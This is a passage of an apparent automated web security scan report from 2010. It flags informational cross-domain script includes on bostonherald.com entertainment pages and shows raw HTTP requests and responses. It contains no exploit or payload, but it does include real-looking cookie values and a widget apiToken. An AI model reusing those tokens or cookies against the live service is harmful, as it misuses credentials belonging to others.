<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.41. http://bostonherald.com/entertainment/arts_culture/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/arts_culture/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.42. http://bostonherald.com/entertainment/books/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/books/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/books/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:28:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.43. http://bostonherald.com/entertainment/contests/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/contests/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /entertainment/contests/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.44. http://bostonherald.com/entertainment/fashion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/fashion/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/fashion/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:24:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.45. http://bostonherald.com/entertainment/food_dining/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/food_dining/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/food_dining/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:22:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.46. http://bostonherald.com/entertainment/health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/health/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:23:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.47. http://bostonherald.com/entertainment/horoscope/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/horoscope/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /entertainment/horoscope/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:47:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.48. http://bostonherald.com/entertainment/lifestyle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/lifestyle/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:23:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.49. http://bostonherald.com/entertainment/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:19:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.50. http://bostonherald.com/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:39:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.51. http://bostonherald.com/entertainment/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/music/

